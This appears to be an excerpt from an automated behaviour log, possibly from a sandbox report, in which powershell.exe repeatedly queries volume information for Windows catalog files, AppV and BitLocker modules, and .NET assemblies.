Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
